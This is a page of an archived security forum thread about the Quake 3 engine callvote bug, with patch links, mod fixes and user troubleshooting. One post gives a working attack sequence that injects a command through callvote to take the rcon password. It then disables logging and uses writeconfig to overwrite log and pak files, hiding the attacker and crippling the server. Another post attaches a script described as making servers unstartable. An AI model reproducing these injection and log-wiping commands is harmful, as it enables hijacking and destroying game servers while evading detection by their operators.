Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:04

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 54 posts ]  Go to page Previous  1, 2
Author Message
 Post subject: Re: quake3 engine callvote bug
PostPosted: 23 Feb 2009 18:43 

Joined: 03 Feb 2009 19:52
Posts: 36
Location: Switzerland
..... sry, it was also damaged at my computer, i dont know how i get that fixed but i have download it now directly from my server into desktop and that must work!
http://www.for.bplaced.net/include/down ... ei3862.rar


Top
 Profile  
 
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 23 Feb 2009 19:31 

Joined: 13 Jan 2008 16:13
Posts: 5
Eragon wrote:
..... sry, it was also damaged at my computer, i dont know how i get that fixed but i have download it now directly from my server into desktop and that must work!
http://www.for.bplaced.net/include/down ... ei3862.rar


Cheers it works :)


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 24 Feb 2009 19:12 

Joined: 03 Feb 2009 19:52
Posts: 36
Location: Switzerland
:)


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 09 Mar 2009 10:29 

Joined: 09 Mar 2009 10:22
Posts: 2
when i tried that patched with ET_q3cbufexec.exe version i've been kicked (for integrity failure) before the vote passed,but yesterday with this patch smb crash our srv, so how it work? I must know to fix it on my server.


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 09 Mar 2009 12:16 

Joined: 27 Mar 2008 11:33
Posts: 6
Quote:
Any way to fix linux binaries ? or patch it someway?

Up!


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 10 Mar 2009 07:10 

Joined: 09 Mar 2009 10:22
Posts: 2
same result :( integrity failure


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 13 Mar 2009 19:12 

Joined: 03 Feb 2009 19:52
Posts: 36
Location: Switzerland
you have to replace the jampgamei386.so file with that patched jampgamei386.so file. do it in base - or your mod - folder. It should appear then in Gamedata AND base. then start-up your server again. And your sure that your server is linux? It must works. If you have another jampgamei386.so file like one of qmm (qmm_jampgamei386.so) delete that.


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 15 Mar 2009 11:18 

Joined: 15 Mar 2009 11:16
Posts: 3
hello
just to tell that the last version of the JA+ Mod (version JA+ 2.4 beta4) for jedi academy is proctecting against this exploit.

you can download the last version here
http://www.japlus.net/


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 15 Mar 2009 19:34 

Joined: 27 Mar 2008 11:33
Posts: 6
slider wrote:
hello
just to tell that the last version of the JA+ Mod (version JA+ 2.4 beta4) for jedi academy is proctecting against this exploit.

you can download the last version here
http://www.japlus.net/

including a linux ver.?


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 16 Mar 2009 20:53 

Joined: 15 Mar 2009 11:16
Posts: 3
yes
it includes windows and linux version


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 27 Mar 2009 22:16 

Joined: 27 Mar 2009 21:56
Posts: 3
idk if this is widely known or even that helpful, but I figured out a way to make stealing rcon with the callvote bug virtually undetectable. Basically you get rcon, and then use it to disable logging and overwrite the logfiles with writeconfig. You can overwrite pretty much whatever you want. I tested this on a mod called Urban Terror (uses a custom build of ioquake), and managed to overwrite the large pak file which contains maps, textures, etc. Making the server load a map then crashes the server because obviously there is no map to load.

/callvote map "mapname yes:1 no:0 (lot of spaces);rconpassword whatever"
If it's a popular map, it should trick people into voting yes.:)

/rcon dir .
Find out what the log file is called.

/rcon logfile 0
Disable logging to qconsole, so that your rcon commands aren't logged. If you don't do this, qconsole.log will keep regenerating. More on that after, it's really weird/funny.

/rcon writeconfig qconsole.log
Qconsole.log is the most important log, as it stores IPs from rcon commands.

/rcon writeconfig logname.log
Usually games.log, but some league configs will have a different .log.


Now if anyone tries to look at the logs to find who attacked their server, your IP won't show up. Of course there are other ways of getting IPs, like an admin /status'ing before the rcon password changed. Someone could also conceivably check networking hardware logs to find IPs of those connected.


Anyway when you do logfile 0, it stops logging. So qconsole.log isn't being written to anymore. When you overwrite qconsole.log, its contents is replaced by the server .cfg in memory. So a 2+ MB qconsole.log suddenly becomes a 5kb file with a bunch of config info haha. But if you reenable logfile 3 or forget to disable it in the first place, the qconsole.log will retain its previous size. However, all the data stored in from when the file was created to when you overwrote it with writeconfig, will be replaced with blank spaces! At the top will be the config, and then a LOT of whitespace. At the bottom normal logging will be there, starting from either when you reenabled logging, or from after you did writeconfig (if you didn't disable logging). Very weird. I suspect this has to do with logsyncing options, and could probably be "fixed" by changing a specific cvar. Writeconfig will DESTROY all data that exists in the log when you run it, so this is merely a weird "bug" that's of no use to a server admin trying to find his attacker (unless the attacker didn't disable logging before wiping the logs...).

So yeah this might be known, idk. It's not really a huge deal because servers should be running the patch for the callvote bug anyway, and most popular ones do. It just struck me really funny that you can replace a 500+MB pak file and totally cripple a server with a simple command (which shouldn't even exist server side...why do you need writeconfig on a server?), not to mention make it nearly impossible to detect who haxed a server with callvote.


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 05 Apr 2009 14:40 

Joined: 03 Feb 2009 19:52
Posts: 36
Location: Switzerland
Yeah, just we found that first :P

Eragon wrote:
well, sry for my unclearly words.... but its fact, that you can't crash a JA+ Mod 2.4 Server with infoboom..i dont care why :) @aluigi, i though, i can tell here about some new myth's :P

Back to topic: I really dont know about some new programs..and im searching for them too.

But Shadow and Me "created" a script that, makes a server not startable again, if you have RCON. But im not sure if that really works :P, we have try'ed it on a few server and there it works, our idea, to write the serverconfig with "writeconfig" in all important files, with rcon writeconfig for linux servers... and theres the problem that it really need rcon :P, we get them just with download 1 or callvote.

you can delete my post, or change it to another topic, because its probably nothing about non-rcon way to crash servers.

Best Regards, Eragon


Attachments:
File comment: Arrow up for basicly cmds, for ja+ right arrow, for base left arrow..
serverbash.zip /download/file.rar?id=119 [645 Bytes]
Downloaded 27 times


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 05 Apr 2009 16:40 

Joined: 15 Mar 2009 11:16
Posts: 3
woa Eragon
this writeconfig rcon cmd once you managed to take the rcon password is really awfull....
with this kind of cmd i guess the server has to be entirely reinstalled back because all pk3 are screwed up.

seeing that, i am happy to have fixed everything in my last version of JA+ Mod 2.4 Beta4


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 05 Apr 2009 23:20 

Joined: 03 Feb 2009 19:52
Posts: 36
Location: Switzerland
I take that as a positive post of you ;)
Its a honour, hearing that of you :D


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 06 Apr 2009 00:37 

Joined: 30 Dec 2008 01:30
Posts: 17
slider you done a good job with you JA+ Mod. If you ever make a new version of it you know what you have to fix. You must fix the writeconfig cmd so that you only can write files with the extension .cfg!


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 12 Oct 2009 20:33 

Joined: 29 Jun 2008 21:11
Posts: 28
has anybody ever got this to work in any version of quake 3? i tried 1.32, and installed a fresh copy (original in store disk) of 1.16 and tried it and i still got the invalid vote string (the disk is from 2002/2003) no updates or patches.

I ran the quake3_q3cbufexec.exe


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 12 Oct 2009 23:47 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I have performed all the tests with the latest patched versions, so 1.32c in the case of quake3.


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 13 Oct 2009 08:59 

Joined: 29 Jun 2008 21:11
Posts: 28
ya that was the problem... seems it only works with 1.32c. sometimes it crashes if im in the server too long, but i run it soon as I get there and im ok


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 02 Jan 2010 02:44 

Joined: 02 Jan 2010 02:39
Posts: 1
Hi all, i got problem with q3cbufexec. I do for example /callvote map "mp/ffa3;rconpassword none" and vote pass but rcon dont change.

Wht i need to do to change rcon?


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 07 Jan 2010 04:53 

Joined: 07 Aug 2008 06:01
Posts: 45
Most servers have patched this already fortunately. >_> Don't beg on how to hack rcon, because no one's going to help you Lol. =D


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 08 Jan 2010 15:00 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
if i would be interested, i would post it up on public.


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 23 Dec 2010 16:21 

Joined: 30 Dec 2008 01:30
Posts: 17
The patched exe dont work for me under windows 7 with jka. Is this only my problem or on every windows 7 system? Are there any solutions for it ?


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 23 Dec 2010 17:35 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
try to disable DEP for the executable of the game


Top
 Profile  
 
 Post subject: Re: quake3 engine callvote bug
PostPosted: 26 Dec 2010 14:43 

Joined: 30 Dec 2008 01:30
Posts: 17
Doesnt work :( i disabled DEP i tried the compatible mod and so on windows problem solve function but every time i start the game with the modded .exe it crashes at the startup


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 54 posts ]  Go to page Previous  1, 2

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: